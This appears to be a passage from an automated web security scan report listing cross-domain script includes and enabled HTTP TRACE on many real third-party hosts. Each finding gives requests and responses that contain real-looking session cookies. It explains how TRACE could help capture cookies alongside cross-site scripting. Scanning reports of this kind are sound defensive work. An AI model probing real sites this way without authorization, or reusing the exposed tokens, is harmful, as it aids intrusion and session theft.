Date: Tue, 19 Jul 2011 14:20:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Tue, 19 Jul 2011 16:20:48 GMT
Vary: Accept-Encoding
Content-Length: 28599
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <Title>Issue Tracking Software| TestTrack Pro | Bug Tracking
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.90. http://www.stubhub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298 HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:48 GMT
Server: Apache
Set-Cookie: TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 4cb3#816c93/
com-stubhub-dye: 4cb3#816c93/
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Set-Cookie: STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/
Set-Cookie: STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/lt/www-3.8.css"><script src="http://cache1.stubhubstatic.com/promotions/scratch/test/mbox.js" language="Javascript1.2"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/foresee_v1/foresee-trigger.js"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/getCookie-2.1.js"></script>
...[SNIP]...
</noscript><script src="http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/omniSearch_02.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://cache1.stubhubstatic.com/promotions/scratch/test/s_code_common.js"></script>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201105231737.min.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-1.2.js" type="text/javascript"></script><script src="http://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/resources/mojito/js/feature/ticket-1.0.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/resources/js/third_party/jquery.autocomplete.js"></script>
...[SNIP]...
</div><script src="http://cache1.stubhubstatic.com/promotions/scratch/lt/bubble.min-1.0.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/geo_ui_v8.2.min.js"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/content-1.1.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/baynote/baynote.js"></script>
...[SNIP]...

21.91. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48644
Date: Tue, 19 Jul 2011 14:28:25 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<![endif]-->
       
       
           <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://cdn.stumble-upon.com/js/plugins_su.js?v=20110718-01"></script>
...[SNIP]...
<!-- end wrapper -->

   <script type="text/javascript" charset="utf-8" src="http://cdn.stumble-upon.com/js/attach_su.js?v=20110718-01"></script>
...[SNIP]...

21.92. http://www.techexcel.com/products/devsuite/devteststudio.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techexcel.com
Path:   /products/devsuite/devteststudio.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/devsuite/devteststudio.html?gclid=CLL574jNjaoCFchM4AodNRT1yQ HTTP/1.1
Host: www.techexcel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 35123
Content-Type: text/html
Last-Modified: Mon, 11 Jul 2011 09:00:56 GMT
Accept-Ranges: bytes
ETag: "ac7fbcba93fcc1:a7ae"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:29 GMT

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script><script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

21.93. http://www.versionone.com/Product/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.versionone.com
Path:   /Product/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Product/ HTTP/1.1
Host: www.versionone.com
Proxy-Connection: keep-alive
Referer: http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; _mkto_trk=id:040-EEX-147&token:_mch-versionone.com-1311085361365-31952; __utma=174222397.1249898466.1311085361.1311085361.1311085361.1; __utmb=174222397.1.10.1311085361; __utmc=174222397; __utmz=174222397.1311085361.1.1.utmgclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ|utmccn=(not%20set)|utmcmd=(not%20set); s_vi=[CS]v1|2712C995051D310C-4000012AC02E50CA[CE]; ASPSESSIONIDCCQACASR=JNBKCBDCLNHEPCHJEOODAHCK; s_sq=vonenewprod%3D%2526pid%253Dlead%252520form%25253A%252520agile%252520poster%25253A%252520mkto%252520form%2526pidt%253D1%2526oid%253Dhttp%25253A//www.versionone.com/Product%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:23:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 22567
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Agile Project
...[SNIP]...
<link rel="icon" href="/images/favicon.ico" />

<script src="http://cdn.jquerytools.org/1.1.2/full/jquery.tools.min.js"></script>
...[SNIP]...
<!-- Marketo analytics tracking code-->
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

22. TRACE method is enabled  previous  next
There are 21 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


22.1. http://ads.as4x.tmcs.ticketmaster.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com
Cookie: 197ce159ae2376c5

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ads.as4x.tmcs.ticketmaster.com
Cookie: 197ce159ae2376c5; NGUserID=a4b2480-32187-970230788-20; GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_
...[SNIP]...

22.2. http://bh.contextweb.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 903f9c3189259ed8

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
Content-Type: message/http
Content-Length: 886
Date: Tue, 19 Jul 2011 18:37:29 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 903f9c3189259ed8; cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd
...[SNIP]...

22.3. http://bing.fansnap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bing.fansnap.com
Cookie: b0e80d6ebe82b186

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:42 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bing.fansnap.com
Cookie: b0e80d6ebe82b186; tvid=; bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRV
...[SNIP]...

22.4. http://blog.linode.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.linode.com
Path:   /

Request

TRACE / HTTP/1.0
Host: blog.linode.com
Cookie: 91d1aedfbe20998e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:31:39 GMT
Server: Apache/2.2.8 (Ubuntu)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: blog.linode.com
Cookie: 91d1aedfbe20998e; __utma=237427869.559622143.1311085869.1311085869.1311085869.1; __utmb=237427869.1.10.1311085869; __utmc=237427869; __utmz=237427869.1311085869.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|u
...[SNIP]...

22.5. http://cache.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: 56ad97b12d61a141

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:20 GMT
Server: PWS/1.7.2.3
X-Px: nc jfk-agg-n63 ( origin>CONN)
Content-Length: 360
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: ads.specificmedia.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 jfk-agg-n63.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.49.73
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cache.specificmedia.com/
Cookie: 56ad97b12d61a141
Connection: keep-alive


22.6. http://cdn1.diggstatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn1.diggstatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cdn1.diggstatic.com
Cookie: 3fe9f2a6727317e8

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:38 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3fe9f2a6727317e8
Accept-Encoding: gzip
Host: media.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.21
x-chpd-loop: 1
Via: 1.0 PXY008-ASHB.COTENDO.NET (chpd/4.01.0008.8)
Cneonct
...[SNIP]...

22.7. http://cheetah.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: b3e5f20c9803fbb4

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:23 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n29 ( origin>CONN)
Content-Length: 354
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n29.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.39
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://cheetah.vizu.com/
Cookie: b3e5f20c9803fbb4
Connection: keep-alive


22.8. http://clk.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: clk.specificclick.net
Cookie: 48d3874811ac5569

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 92
Date: Tue, 19 Jul 2011 20:44:45 GMT
Connection: close

TRACE / HTTP/1.0
host: clk.specificclick.net
cookie: 48d3874811ac5569; ug=WPTUOuwXp9NyRD

22.9. http://digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: digg.com
Cookie: 3b6e05b8cf43111a

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: digg.com
Cookie: 3b6e05b8cf43111a; d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=14
...[SNIP]...

22.10. http://matcher-apx.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-apx.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 56488ab3e0aca14f

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:00 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-apx.bidder7.mookie1.com
Cookie: 56488ab3e0aca14f; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.11. http://matcher-cwb.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher-cwb.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: 3dac40085069acde

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:38:08 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-cwb.bidder7.mookie1.com
Cookie: 3dac40085069acde; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.12. http://matcher.bidder7.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: cc0191b083c501c1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:01 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder7.mookie1.com
Cookie: cc0191b083c501c1; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.13. http://matcher.bidder8.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matcher.bidder8.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 330ef759185428c0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:27 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher.bidder8.mookie1.com
Cookie: 330ef759185428c0; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.14. http://puma.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: 7ed2d0f24439cba2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: nc iad-agg-n5 ( origin>CONN)
Content-Length: 343
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 iad-agg-n5.panthercdn.com PWS/1.7.2.3
X-Forwarded-For: 173.193.214.243, 66.114.52.15
X-Forwarded-IP: 173.193.214.243
X-Initial-Url: http://puma.vizu.com/
Cookie: 7ed2d0f24439cba2
Connection: keep-alive


22.15. http://rmedia.boston.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rmedia.boston.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rmedia.boston.com
Cookie: e0b552b1c3815535

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rmedia.boston.com
Cookie: e0b552b1c3815535; OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl
Co
...[SNIP]...

22.16. http://rt.legolas-media.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 7931fe05c2b81c4a

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 7931fe05c2b81c4a; ui=e01db2f2-208a-43e5-beec-a78df4693afe; lgpr=//8=; lgtix=NQACAAQBBgABAAMBRAQDAPQASQABAAMBSgABAAMBDAABAAMB/QACAAMBXwABAAMB
X-Forwarded-For: 173.193.214.243


22.17. http://sharethis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sharethis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sharethis.com
Cookie: 895a9ceb6325ee9b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:32 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: sharethis.com
Cookie: 895a9ceb6325ee9b; __uset=yes; __utmb=164916925.2.9.1311085613; __utmc=164916925; __stid=CspjoE3OVb2YWRTJR8rMAg==; __utmz=206367559.1308922055.12.12.utmcsr=article.wn.com|utmccn=(referral)|utmcmd=referral|utmcct=/view/
...[SNIP]...

22.18. http://t.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f464557de0591141

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:58 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f464557de0591141; OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; ti
...[SNIP]...

22.19. http://widgets.outbrain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: ee484a15c59a7212

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:18 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
